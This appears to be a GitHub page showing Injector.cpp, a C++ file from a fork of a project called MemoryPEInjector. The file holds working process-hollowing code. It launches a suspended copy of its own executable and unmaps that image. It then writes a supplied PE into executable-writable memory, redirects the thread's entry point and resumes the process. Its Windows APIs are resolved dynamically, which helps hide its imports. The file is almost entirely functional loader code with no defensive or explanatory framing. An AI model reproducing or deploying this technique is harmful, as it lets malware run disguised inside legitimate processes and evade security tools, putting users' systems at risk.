forked from Codeh4ck/MemoryPEInjector
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Injector.cpp
173 lines (140 loc) · 5.31 KB
/
Injector.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
#include "Injector.h"
// CP = CreateProcess
typedef BOOL(WINAPI *CP)(
_In_opt_ LPCTSTR lpApplicationName,
_Inout_opt_ LPTSTR lpCommandLine,
_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ BOOL bInheritHandles,
_In_ DWORD dwCreationFlags,
_In_opt_ LPVOID lpEnvironment,
_In_opt_ LPCTSTR lpCurrentDirectory,
_In_ LPSTARTUPINFO lpStartupInfo,
_Out_ LPPROCESS_INFORMATION lpProcessInformation
);
// WPM = WriteProcessMemory
typedef BOOL(WINAPI *WPM)(
_In_ HANDLE hProcess,
_In_ LPVOID lpBaseAddress,
_In_ LPCVOID lpBuffer,
_In_ SIZE_T nSize,
_Out_ SIZE_T *lpNumberOfBytesWritten
);
// RPM = ReadProcessMemory
typedef BOOL(WINAPI *RPM)(
_In_ HANDLE hProcess,
_In_ LPCVOID lpBaseAddress,
_Out_ LPVOID lpBuffer,
_In_ SIZE_T nSize,
_Out_ SIZE_T *lpNumberOfBytesRead
);
// UVOS = (Nt)UnmapViewOfSection
typedef long (WINAPI *UVOS)(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress
);
// VAX = VirtualAllocEx
typedef void *(WINAPI *VAX)(
_In_ HANDLE hProcess,
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
// GTC = GetThreadContext
typedef BOOL(WINAPI *GTC)(
_In_ HANDLE hThread,
_Inout_ LPCONTEXT lpContext
);
// STC = SetThreadContext
typedef BOOL(WINAPI *STC)(
_In_ HANDLE hThread,
_In_ const CONTEXT *lpContext
);
// RT = ResumeThread
typedef DWORD(WINAPI *RT)(
_In_ HANDLE hThread
);
Injector::Injector()
{
//
}
Injector::~Injector()
{
//
}
unsigned char *Injector::ReadFileBytes(const TCHAR *name)
{
HANDLE hFile = CreateFile(name, GENERIC_READ, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD read = 0;
DWORD dwFileSize = GetFileSize(hFile, NULL);
unsigned char *lpBuffer = new unsigned char[dwFileSize];
ReadFile(hFile, lpBuffer, dwFileSize, &read, NULL);
CloseHandle(hFile);
return lpBuffer;
}
void Injector::Inject(LPBYTE lpBuffer) const
{
PIMAGE_DOS_HEADER idh;
PIMAGE_NT_HEADERS inh;
PIMAGE_SECTION_HEADER ish;
CONTEXT ctc;
// Load the necessary functions from their libraries. A pointer to the function needed is returned.
UVOS UVS = reinterpret_cast<UVOS>(LoadFunction(L"ntdll.dll", "NtUnmapViewOfSection"));
WPM WM = reinterpret_cast<WPM>(LoadFunction(L"kernel32.dll", "WriteProcessMemory"));
VAX VA = reinterpret_cast<VAX>(LoadFunction(L"kernel32.dll", "VirtualAllocEx"));
GTC GC = reinterpret_cast<GTC>(LoadFunction(L"kernel32.dll", "GetThreadContext"));
STC SC = reinterpret_cast<STC>(LoadFunction(L"kernel32.dll", "SetThreadContext"));
RT R = reinterpret_cast<RT>(LoadFunction(L"kernel32.dll", "ResumeThread"));
// Get the DOS and NT headers from the byte array representation of the PE.
idh = reinterpret_cast<PIMAGE_DOS_HEADER>(lpBuffer);
inh = reinterpret_cast<PIMAGE_NT_HEADERS>(lpBuffer + idh->e_lfanew);
// Start our target executable in suspended form
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(STARTUPINFO);
PROCESS_INFORMATION pi;
pi = *CreateNewProcess(0, L"", &si, &pi);
// Clear it's virtual memory and map our new executable within its process space
UVS(pi.hProcess, reinterpret_cast<void*>(inh->OptionalHeader.ImageBase));
VA(pi.hProcess, reinterpret_cast<void*>(inh->OptionalHeader.ImageBase), inh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WM(pi.hProcess, reinterpret_cast<void*>(inh->OptionalHeader.ImageBase), reinterpret_cast<LPCVOID>(lpBuffer), inh->OptionalHeader.SizeOfHeaders, NULL);
// Write the PE sections
for (int x = 0; x < inh->FileHeader.NumberOfSections; x++)
{
ish = reinterpret_cast<PIMAGE_SECTION_HEADER>(lpBuffer + idh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (x * IMAGE_SIZEOF_SECTION_HEADER));
WM(pi.hProcess, reinterpret_cast<void*>(inh->OptionalHeader.ImageBase + ish->VirtualAddress), reinterpret_cast<LPCVOID*>(lpBuffer + ish->PointerToRawData), ish->SizeOfRawData, NULL);
}
// Resume the process, which now contains our own executable in its memory space
ctc.ContextFlags = CONTEXT_FULL;
GC(pi.hThread, &ctc);
WM(pi.hProcess,
#if defined(_X86_)
reinterpret_cast<void *>(ctc.Ebx + 8),
#elif defined(_AMD64_)
reinterpret_cast<void *>(ctc.Rdx + 16),
#endif
reinterpret_cast<LPVOID>(&inh->OptionalHeader.ImageBase), sizeof(inh->OptionalHeader.ImageBase), NULL);
#if defined(_X86_)
ctc.Eax = inh->OptionalHeader.ImageBase + inh->OptionalHeader.AddressOfEntryPoint;
#elif defined(_AMD64_)
ctc.Rcx = inh->OptionalHeader.ImageBase + inh->OptionalHeader.AddressOfEntryPoint;
#endif
SC(pi.hThread, &ctc);
R(pi.hThread);
}
FARPROC Injector::LoadFunction(const TCHAR *szLib, char *szMod) const
{
HMODULE hFunc = GetModuleHandle(szLib);
return GetProcAddress(hFunc, szMod);
}
PROCESS_INFORMATION *Injector::CreateNewProcess(DWORD id, TCHAR *szArgs, STARTUPINFO *si, PROCESS_INFORMATION *pi) const
{
CP C = reinterpret_cast<CP>(LoadFunction(L"kernel32.dll", "CreateProcessW"));
TCHAR szCurrentPath[MAX_PATH];
HMODULE hCurrentModule = GetModuleHandle(nullptr);
if (hCurrentModule != nullptr)
GetModuleFileName(hCurrentModule, szCurrentPath, sizeof(szCurrentPath)/sizeof(TCHAR));
C(szCurrentPath, L"", nullptr, nullptr, false, 0x4, nullptr, nullptr, si, pi);
return pi;
}